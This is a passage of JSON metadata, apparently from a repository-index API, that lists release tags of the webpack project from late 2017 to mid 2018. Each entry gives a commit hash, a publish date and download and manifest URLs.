ack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_u